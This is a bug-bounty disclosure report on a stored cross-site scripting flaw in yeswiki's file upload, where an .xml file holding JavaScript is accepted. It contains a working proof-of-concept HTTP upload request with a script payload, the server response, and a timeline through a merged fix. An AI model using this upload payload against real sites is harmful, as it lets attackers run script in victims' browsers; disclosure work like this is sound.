Cross-site scripting - Stored via upload ".xml" file in yeswiki/yeswiki

Valid

Reported on

Jul 27th 2022


Description

In file upload function, the server allow upload .xml file with contain some javascript code lead to XSS.

Proof of Concept

REQUEST

POST /?PageTitre/ajaxupload&qqfile=index.xml HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: index.html
Content-Type: application/octet-stream
Content-Length: 39
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/?PageTitre/edit
Cookie: wp-settings-time-1=1658856152; YesWiki-main=g6bv3567aj3la9qfeob02ni1mv
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


<script>alert(window.origin)</script>

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 27 Jul 2022 08:49:10 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
X-frame-Options: deny
Content-Security-Policy: frame-ancestors 'none';
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: YesWiki-main=g6bv3567aj3la9qfeob02ni1mv; path=/; HttpOnly
Set-Cookie: name=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly
Set-Cookie: password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly
Set-Cookie: remember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly
Content-Length: 133
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":"1","filename":"files\/PageTitre_index_20220727154155_20220727104911.xml_","simplefilename":"index.xml","extension":"xml"}

PoC Image

image

Impact

This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

We are processing your report and will contact the yeswiki team within 24 hours. 2 months ago
We have contacted a member of the yeswiki team and are waiting to hear back 2 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 2 months ago
Jérémy Dufraisse validated this vulnerability 2 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the yeswiki team. We will try again in 7 days. 2 months ago
Jérémy Dufraisse confirmed that a fix has been merged on 145c0b a month ago
The fix bounty has been dropped
to join this conversation